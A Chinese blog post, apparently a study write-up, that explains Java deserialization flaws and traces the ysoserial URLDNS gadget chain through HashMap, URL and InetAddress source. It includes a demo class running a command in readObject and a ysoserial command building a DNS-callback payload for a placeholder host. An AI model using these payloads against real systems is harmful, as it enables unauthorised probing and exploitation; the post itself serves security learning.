java-URLDNS链分析

最新推荐文章于 2024-02-06 00:51:11 发布
最新推荐文章于 2024-02-06 00:51:11 发布
阅读量339 收藏 1
点赞数 2
分类专栏: java安全 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62613905/article/details/128790774
版权

什么是序列化和反序列化?

序列化是将 Java 对象转换成与平台无关的二进制流,而反序列化则是将二进制流恢复成原来的 Java 对象,二进制流便于保存到磁盘上或者在网络上传输。

如何实现序列化和反序列化

如果想要序列化某个类的对象,就需要让该类实现 Serializable 接口或者 Externalizable 接口。

如果实现 Serializable 接口,由于该接口只是个 “标记接口”,接口中不含任何方法,序列化是使用 ObjectOutputStream(处理流)中的 writeObject(obj) 方法将 Java 对象输出到输出流中,反序列化是使用 ObjectInputStream 中的 readObject(in) 方法将输入流中的 Java 对象还原出来。

不安全的类

重写了readObject方法,并且在该方法中执行了恶意命令

import java.io.IOException;
import java.io.Serializable;

public class UnSafeClass implements Serializable {
    public String name;

    //重写readObject()方法
    private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException {
        //执行默认的readObject方法
        in.defaultReadObject();
        //执行命令
        Runtime.getRuntime().exec("calc.exe");
    }
}

调用ObjectOutputStream中的writeObject方法对这个类进行序列化

如果再使用ObjectInputStream 中的readObject方法对这个类进行反序列化,由于已经进行了readObject方法重写,那么就会执行readObject方法中的恶意代码。

测试代码

import java.io.*;

public class UnSafeTest {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        UnSafeClass obj = new UnSafeClass();
        obj.name="hack";

        //序列化
        ObjectOutputStream objectOut = new ObjectOutputStream(new FileOutputStream("D:/zzy.yyy"));
        objectOut.writeObject(obj);
        objectOut.close();

        //反序列化
        ObjectInputStream objIn = new ObjectInputStream(new FileInputStream("D:/zzy.yyy"));
        UnSafeClass unSafeClass = (UnSafeClass) objIn.readObject();
        System.out.println(unSafeClass.name);
        objIn.close();

    }
}

URLDNS链分析

利用

ysoserial是一个集合了各种java反序列化利用链的工具,可以根据不同的利用链快速生成poc

1.利用这条指令将序列化后的数据存储到1.ser序列化文件中(获取dnslog地址填入)

java -jar ysoserial.jar URLDNS "http://xxxx.com" > 1.ser

2.使用ObjectInputStream 中的readObject方法对这个序列化文件进行反序列化

import java.io.FileInputStream;
import java.io.ObjectInputStream;

public class Test_URLDNS {
    public static void main(String[] args) throws Exception {
        ObjectInputStream oi = new ObjectInputStream(new FileInputStream("F:\\1.ser"));
        Object o = oi.readObject();
        System.out.println(o);
    }
}

3.执行后发现dnslog回显

 

原理分析

1.先查看URLDNS反编译后的源码

public class URLDNS
implements ObjectPayload<Object> {
    @Override
    public Object getObject(String url) throws Exception {
        SilentURLStreamHandler handler = new SilentURLStreamHandler();
        HashMap<URL, String> ht = new HashMap<URL, String>();
        URL u = new URL(null, url, handler);
        ht.put(u, url);
        Reflections.setFieldValue(u, "hashCode", -1);
        return ht;
    }

    public static void main(String[] args) throws Exception {
        PayloadRunner.run(URLDNS.class, args);
    }

    static class SilentURLStreamHandler
    extends URLStreamHandler {
        SilentURLStreamHandler() {
        }

        @Override
        protected URLConnection openConnection(URL u) throws IOException {
            return null;
        }

        @Override
        protected synchronized InetAddress getHostAddress(URL u) {
            return null;
        }
    }
}
URL(URL context, String spec, URLStreamHandler handler)通过在指定上下文中使用指定的处理程序解析给定规范来创建URL。

ysoserial会调用getObject方法并获得一个HashMap对象,键为URL对象,ysoserial根据这个对象序列化,那么我们反序列化的类也就是HashMap类,而HashMap类又重写了readObject方法.

2.分析HashMap类的readObject方法

private void readObject(java.io.ObjectInputStream s)
        throws IOException, ClassNotFoundException {
        // Read in the threshold (ignored), loadfactor, and any hidden stuff
        s.defaultReadObject();
        reinitialize();
        if (loadFactor <= 0 || Float.isNaN(loadFactor))
            throw new InvalidObjectException("Illegal load factor: " +
                                             loadFactor);
        s.readInt();                // Read and ignore number of buckets
        int mappings = s.readInt(); // Read number of mappings (size)
        if (mappings < 0)
            throw new InvalidObjectException("Illegal mappings count: " +
                                             mappings);
        else if (mappings > 0) { // (if zero, use defaults)
            // Size the table using given load factor only if within
            // range of 0.25...4.0
            float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f);
            float fc = (float)mappings / lf + 1.0f;
            int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?
                       DEFAULT_INITIAL_CAPACITY :
                       (fc >= MAXIMUM_CAPACITY) ?
                       MAXIMUM_CAPACITY :
                       tableSizeFor((int)fc));
            float ft = (float)cap * lf;
            threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?
                         (int)ft : Integer.MAX_VALUE);

            // Check Map.Entry[].class since it's the nearest public type to
            // what we're actually creating.
            SharedSecrets.getJavaOISAccess().checkArray(s, Map.Entry[].class, cap);
            @SuppressWarnings({"rawtypes","unchecked"})
                Node<K,V>[] tab = (Node<K,V>[])new Node[cap];
            table = tab;

            // Read the keys and values, and put the mappings in the HashMap
            for (int i = 0; i < mappings; i++) {
                @SuppressWarnings("unchecked")
                    K key = (K) s.readObject();
                @SuppressWarnings("unchecked")
                    V value = (V) s.readObject();
                putVal(hash(key), key, value, false, false);
            }
        }
    }

注意最下方的hash(key),对键进行了hash计算,步入hash函数

static final int hash(Object key) {
        int h;
        return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
    }

如果键不为null,hash函数会调用键的hashCode方法,现在的键值为URL对象,我们跟进URL类的hashCode方法

public synchronized int hashCode() {
        if (hashCode != -1)
            return hashCode;

        hashCode = handler.hashCode(this);
        return hashCode;
    }

此时这里的handler为URLStreamHandler子类对象,那么我们需要调用父类的hashCode方法

继续跟进URLStreamHandler的hashCode方法

protected int hashCode(URL u) {
        int h = 0;

        // Generate the protocol part.
        String protocol = u.getProtocol();
        if (protocol != null)
            h += protocol.hashCode();

        // Generate the host part.
        InetAddress addr = getHostAddress(u);
        if (addr != null) {
            h += addr.hashCode();
        } else {
            String host = u.getHost();
            if (host != null)
                h += host.toLowerCase().hashCode();
        }

        // Generate the file part.
        String file = u.getFile();
        if (file != null)
            h += file.hashCode();

        // Generate the port part.
        if (u.getPort() == -1)
            h += getDefaultPort();
        else
            h += u.getPort();

        // Generate the ref part.
        String ref = u.getRef();
        if (ref != null)
            h += ref.hashCode();

        return h;
    }

我们注意到这个方法调用了getHostAddress方法,这个方法源码如下

protected synchronized InetAddress getHostAddress(URL u) {
        if (u.hostAddress != null)
            return u.hostAddress;

        String host = u.getHost();
        if (host == null || host.equals("")) {
            return null;
        } else {
            try {
                u.hostAddress = InetAddress.getByName(host);
            } catch (UnknownHostException ex) {
                return null;
            } catch (SecurityException se) {
                return null;
            }
        }
        return u.hostAddress;
    }

getByName,顾名思义通过主机名获取ip地址,其实它执行了DNS查询

wireshark抓包

 至此分析完毕,URLDNS链本身不具有攻击性,但是它可以帮我们侦测目标是否存在反序列化漏洞,对我们学习反序列化有一定帮助,最后附上一张流程图。

本文仅供学习交流

Innocent..
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
java如何设计链路跟踪_JAVA方法链路跟踪实现思路
weixin_36011776的博客
02-26 922
背景为了掌握链路中方法的执行情况,通过链路分析可以知道代码逻辑实现。技术显然,为了需要跟踪方法的执行情况,需要对方法进行aop拦截生成字节码技术的方式有两种,一种类于javaproxy产生的字节码样式。一种是在进入方法和限出方法时注入代码实现aop代码增强(2)。具体实现见asm实现AOP的两篇文章另外,对于代码的跟踪,还需要一个数据结构来记录一个链路的代码执行情况。具体实现静态AOP基于java...
java序列化漏洞-基础
GalaxySpaceX的博客
02-23 338
java序列化漏洞
Java安全】ysoserial-URLDNS链分析
最新发布
网络安全从业者的学习笔记
02-06 1779
Java安全中经常会提到反序列化,一个将Java对象转换为字节序列传输(或保存)并在接收字节序列后反序列化Java对象的机制,在传输(或保存)的过程中,恶意攻击者能够将传输的字节序列替换为恶意代码进而触发反序列化漏洞。其中最经典的反序列化漏洞利用工具——ysoserial,下面就分析学习一下ysoserial中的URLDNS链,以便更好地理解反序列化漏洞。
URLDNS链分析
sunyufei_666的博客
09-06 389
JAVA安全
URLDNS序列化链学习.doc
07-09
URLDNS序列化链学习】文档主要涉及的是Java中的一个安全问题,即URLDNS序列化链。这是一种利用Java对象序列化机制进行攻击的技术,通常与代码注入和远程代码执行(RCE)漏洞相关。在这个特定的案例中,虽然不能...
JAVA上百实例源码以及开源项目
01-03
 Java局域网通信——飞鸽传书源代码,大家都知道VB版、VC版还有Delphi版的飞鸽传书软件,但是Java版的确实不多,因此这个Java文件传输实例不可错过,Java网络编程技能的提升很有帮助。 Java聊天程序,包括服务端和...
java开源包1
06-28
JCarder 是一个用来查找多线程应用程序中一些潜在的死锁,通过对 Java 字节码的动态分析来完成死锁分析。 Java的Flash解析、生成器 jActionScript jActionScript 是一个使用了 JavaSWF2 的 Flash 解析器和生成器。...
SWT开发的浏览器(Java)--源代码
05-14
通过分析这个源代码,我们可以深入理解SWT如何被用来构建具有实际应用价值的程序。 首先,我们要了解SWT的优势。与Java标准库中的AWT和Swing不同,SWT直接调用操作系统的API,因此在性能和外观上更接近原生应用。这...
java开源包8
06-28
JCarder 是一个用来查找多线程应用程序中一些潜在的死锁,通过对 Java 字节码的动态分析来完成死锁分析。 Java的Flash解析、生成器 jActionScript jActionScript 是一个使用了 JavaSWF2 的 Flash 解析器和生成器。...
使用Java实现DNS域名解析的简单示例
09-03
主要介绍了使用Java实现DNS域名解析的简单示例,包括对一个动态IP主机的域名解析例子,需要的朋友可以参考下
Java应用层数据链路追踪(附优雅打印日志姿势)
muli526的博客
03-08 762
Java应用层数据链路追踪(附优雅打印日志姿势) 今天来聊些大家都用得上的东西:数据链路追踪。之前引入了系统的监控来快速定位应用操作系统上的问题,而业务问题呢?在这篇文章中你可以看到用注解的方式打印日志,也能看到简易版的全链路追踪是怎么实现的。 不多BB,开始吧 01、注解日志打印 日志的搭建我在austin最开始的前几篇已经有提及了,之前一直在等我的基友**@蛮三刀酱**他的日志组件库上传到Maven库,好让我使用使用下。在最近,他已经更新了两个版本,然后传到了Maven库了,所以我就来接入了 这个组件库
序列化URLDNS
BaiScorpio的博客
06-13 426
通过 URLDNS学习Java序列化相关的知识。
Java里Ping DNS的多种方式汇总
chenxie2031的博客
09-14 377
Java里Ping DNS的多种方式汇总,不多说直接代码。 package com.jvwl.rds.test; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStrea...
写bat脚本双击执行
qq_35911118的博客
04-08 2754
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
DNSLog使用笔记
糖小喵
09-27 5195
首先DNSlog网址:http://www.dnslog.cn/ 一般用作回显,这里会记录请求,也就是记录DNS访问记录的东西,同样在局域网可用http服务。
java链路模式,java分布式链路追踪;jvm应用监控-skywalking
weixin_42117150的博客
03-16 618
当企业应用进入分布式微服务时代,应用服务依赖会越来越多,skywalking可以很好的解决服务调用链路追踪的问题,而且基于java探针技术,基本对应用零侵入零耦合。skywalking是什么,有什么用?Skywalking 是一个APM系统,即应用性能监控系统,为微服务架构和云原生架构系统设计。它通过探针自动收集所需的指标,并进行分布式追踪。通过这些调用链路以及指标,Skywalking APM会...
一文读懂链路追踪
weixin_34054866的博客
06-06 1175
背景介绍 在微服务横行的时代,服务化思维逐渐成为了程序员的基本思维模式,但是,由于绝大部分项目只是一味地增加服务,并没有对其妥善管理,当接口出现问题时,很难从错综复杂的服务调用网络中找到问题根源,从而错失了止损的黄金时机。 而链路追踪的出现正是为了解决这种问题,它可以在复杂的服务调用中定位问题,还可以在新人加入后台团队之后,让其清楚地知道自己所负责的服务在哪一环。 除此之外,如果某个接口突然...
ysoserial 动态调试
sojrs_sec的博客
12-24 1489
前言 在尝试对cve-2018-2628反序列化漏洞做分析的时候,发现一个比较重要的概念是JRMP,而在ysoserial中已经实现了JRMP的客户端和服务端,所以想可以直接进行动态调试一下,大概了解下JRMP的机制,下面简单讲一下ysoserial的调试方法 调试步骤: Cve-2018-2628需要开启JRMPListener以及JRMPClient,这里我以调试JRMPClient为例,参照...
网络交友平台的兴起:Java-Web在线交友系统分析
"Java-web在线交友系统期末论文" 这篇文档主要讨论了基于Java-web技术开发的在线交友系统,这是在科技日益发达的背景下,利用计算机技术促进人际交往的一个实例。随着网络技术的进步,人们的社交方式也在发生变化,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值